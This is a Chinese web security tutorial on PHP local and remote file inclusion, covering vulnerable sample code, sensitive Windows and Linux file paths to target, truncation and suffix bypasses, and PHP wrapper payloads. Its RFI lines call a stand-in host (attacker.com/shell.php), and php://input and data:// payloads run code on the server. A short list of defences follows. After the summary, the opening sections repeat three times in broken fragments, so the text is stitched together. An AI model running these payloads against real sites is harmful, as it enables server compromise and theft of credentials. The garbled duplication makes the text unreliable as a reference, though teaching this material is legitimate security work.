Web安全实战：文件包含漏洞详解<\/h1>

0x01 文件包含简介<\/h2>
文件包含漏洞是Web安全中常见的一种漏洞类型，主要存在于PHP等服务器端脚本语言中。当开发者使用文件包含函数时，如果参数未经严格过滤，攻击者可能利用此漏洞执行恶意代码。<\/p>

文件包含函数<\/h3>

PHP中主要有四种文件包含函数：<\/p>

require()<\/code> - 包含文件失败时会报错并终止脚本执行<\/li>
require_once()<\/code> - 同上，但确保文件只被包含一次<\/li>
include()<\/code> - 包含文件失败时发出警告但继续执行<\/li>

include_once()<\/code> - 同上，但确保文件只被包含一次<\/li>
<\/ol>
漏洞产生原因<\/h3>
当文件包含函数的参数未经充分过滤或严格定义，允许用户控制包含的文件路径时，就可能产生文件包含漏洞。<\/p>
示例漏洞代码：<\/p>
<?<\/span>php<\/span> 
<\/span><\/span>$filename =<\/span> $_GET['filename'<\/span>]; 
<\/span><\/span>include<\/span>($filename);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>0x02 本地文件包含漏洞(LFI)<\/h2>
无限制本地文件包含漏洞<\/h3>
直接包含系统文件，可读取敏感信息：<\/p>
Windows系统常见敏感文件路径<\/strong>：<\/p>

c:\boot.ini<\/code> - 查看系统版本<\/li>
c:\windows\system32\inetsrv\MetaBase.xml<\/code> - IIS配置文件<\/li>
c:\windows\repair\sam<\/code> - 存储Windows系统初次安装的密码<\/li>
c:\ProgramFiles\mysql\my.ini<\/code> - MySQL配置<\/li>
c:\ProgramFiles\mysql\data\mysql\user.MYD<\/code> - MySQL root密码<\/li>
c:\windows\php.ini<\/code> - PHP配置信息<\/li>
<\/ul>
Linux\/Unix系统常见敏感文件路径<\/strong>：<\/p>

\/etc\/passwd<\/code> - 账户信息<\/li>
\/etc\/shadow<\/code> - 账户密码文件<\/li>
\/usr\/local\/app\/apache2\/conf\/httpd.conf<\/code> - Apache2默认配置文件<\/li>
\/usr\/local\/app\/php5\/lib\/php.ini<\/code> - PHP相关配置<\/li>
\/etc\/my.conf<\/code> - mysql配置文件<\/li>
<\/ul>
session文件包含漏洞<\/h3>
利用条件<\/strong>：<\/p>

获取session存储位置（通过phpinfo或猜测）<\/li>
能控制session内容<\/li>
<\/ol>
示例漏洞代码<\/strong>：<\/p>
<?<\/span>php<\/span> 
<\/span><\/span>session_start<\/span>(); 
<\/span><\/span>$ctfs=<\/span>$_GET['ctfs'<\/span>]; 
<\/span><\/span>$_SESSION["username"<\/span>]=<\/span>$ctfs; 
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>利用步骤<\/strong>：<\/p>

通过GET参数注入恶意代码到session文件<\/li>
通过文件包含漏洞包含session文件执行代码<\/li>
<\/ol>
有限制本地文件包含漏洞绕过方法<\/h3>


%00截断<\/strong>：<\/p>

条件：magic_quotes_gpc = Off<\/code>且PHP版本<5.3.4<\/li>
示例：?filename=..\/..\/..\/..\/boot.ini%00<\/code><\/li>
<\/ul>
<\/li>

路径长度截断<\/strong>：<\/p>

Windows：超过256字节<\/li>
Linux：超过4096字节<\/li>
示例：?filename=test.txt\/.\/.\/.\/...<\/code>（重复足够多次）<\/li>
<\/ul>
<\/li>

点号截断<\/strong>：<\/p>

仅限Windows<\/li>
示例：?filename=test.txt................<\/code>（足够多的点）<\/li>
<\/ul>
<\/li>
<\/ol>
0x03 远程文件包含漏洞(RFI)<\/h2>
前提条件<\/strong>：<\/p>

allow_url_fopen = On<\/code><\/li>
allow_url_include = On<\/code><\/li>
<\/ul>
无限制远程文件包含<\/h3>
直接包含远程服务器上的PHP文件：

?filename=http:\/\/attacker.com\/shell.php<\/code><\/p>
有限制远程文件包含绕过<\/h3>
当有后缀限制时（如.html<\/code>），可用以下方法绕过：<\/p>


问号绕过<\/strong>：

?filename=http:\/\/attacker.com\/shell.txt?<\/code><\/p>
<\/li>

#号绕过<\/strong>：

?filename=http:\/\/attacker.com\/shell.txt%23<\/code><\/p>
<\/li>

空格绕过<\/strong>：

?filename=http:\/\/attacker.com\/shell.txt%20<\/code><\/p>
<\/li>
<\/ol>
0x04 PHP伪协议利用<\/h2>
php:\/\/filter<\/h3>
用于读取文件内容，特别是获取源码：

?filename=php:\/\/filter\/convert.base64-encode\/resource=index.php<\/code><\/p>
php:\/\/input<\/h3>
用于执行POST数据中的PHP代码：<\/p>
POST \/vuln.php?filename=php:\/\/input HTTP\/1.1
...
<?php system('id'); ?>
<\/code><\/pre>
利用条件<\/strong>：<\/p>

allow_url_include = On<\/code><\/li>
不能用于enctype="multipart\/form-data"<\/code><\/li>
<\/ul>
file:\/\/<\/h3>
直接访问本地文件系统：

?filename=file:\/\/\/etc\/passwd<\/code><\/p>
data:\/\/<\/h3>
类似php:\/\/input，但以数据流形式包含代码：

?filename=data:\/\/text\/plain,<?php phpinfo();?><\/code>

或base64编码：

?filename=data:\/\/text\/plain;base64,PD9waHAgcGhwaW5mbygpOz8+<\/code><\/p>
phar:\/\/<\/h3>
解压压缩包并包含内部文件：

?filename=phar:\/\/shell.zip\/shell.php<\/code>

（可将zip改为任意后缀如png）<\/p>
zip:\/\/<\/h3>
类似phar但语法不同：

?filename=zip:\/\/shell.png%23shell.php<\/code>

（注意#需编码为%23）<\/p>
防御措施<\/h2>

避免直接使用用户输入作为包含参数<\/li>
设置allow_url_fopen = Off<\/code>和allow_url_include = Off<\/code><\/li>
对包含参数进行严格白名单过滤<\/li>
设置open_basedir<\/code>限制文件访问范围<\/li>
及时更新PHP版本，避免已知漏洞<\/li>
<\/ol>
总结<\/h2>
文件包含漏洞危害严重，可导致信息泄露、代码执行等后果。开发人员应严格验证所有包含文件的路径，避免使用用户可控的输入直接作为包含参数。安全人员测试时应全面尝试各种包含方式和绕过技术，确保系统安全性。<\/p>

Web安全实战：文件包含漏洞详解<\/h1>

0x01 文件包含简介<\/h2>
文件包含漏洞是Web安全中常见的一种漏洞类型，主要存在于PHP等服务器端脚本语言中。当开发者使用文件包含函数时，如果参数未经严格过滤，攻击者可能利用此漏洞执行恶意代码。<\/p>

0x02 本地文件包含漏洞(LFI)<\/h2>

无限制远程文件包含<\/h3>
直接包含远程服务器上的PHP文件：
`?filename=http:\/\/attacker.com\/shell.php<\/code><\/p>`

php:\/\/filter<\/h3>
用于读取文件内容，特别是获取源码：
`?filename=php:\/\/filter\/convert.base64-encode\/resource=index.php<\/code><\/p>`

file:\/\/<\/h3>
直接访问本地文件系统：
`?filename=file:\/\/\/etc\/passwd<\/code><\/p>`

Web安全实战：文件包含漏洞详解<\/h1>

0x01 文件包含简介<\/h2> 文件包含漏洞是Web安全中常见的一种漏洞类型，主要存在于PHP等服务器端脚本语言中。当开发者使用文件包含函数时，如果参数未经严格过滤，攻击者可能利用此漏洞执行恶意代码。<\/p>

0x02 本地文件包含漏洞(LFI)<\/h2>

无限制远程文件包含<\/h3> 直接包含远程服务器上的PHP文件： ?filename=http:\/\/attacker.com\/shell.php<\/code><\/p>

php:\/\/filter<\/h3> 用于读取文件内容，特别是获取源码： ?filename=php:\/\/filter\/convert.base64-encode\/resource=index.php<\/code><\/p>

file:\/\/<\/h3> 直接访问本地文件系统： ?filename=file:\/\/\/etc\/passwd<\/code><\/p>

0x01 文件包含简介<\/h2>
文件包含漏洞是Web安全中常见的一种漏洞类型，主要存在于PHP等服务器端脚本语言中。当开发者使用文件包含函数时，如果参数未经严格过滤，攻击者可能利用此漏洞执行恶意代码。<\/p>

无限制远程文件包含<\/h3>
直接包含远程服务器上的PHP文件：
`?filename=http:\/\/attacker.com\/shell.php<\/code><\/p>`

php:\/\/filter<\/h3>
用于读取文件内容，特别是获取源码：
`?filename=php:\/\/filter\/convert.base64-encode\/resource=index.php<\/code><\/p>`

file:\/\/<\/h3>
直接访问本地文件系统：
`?filename=file:\/\/\/etc\/passwd<\/code><\/p>`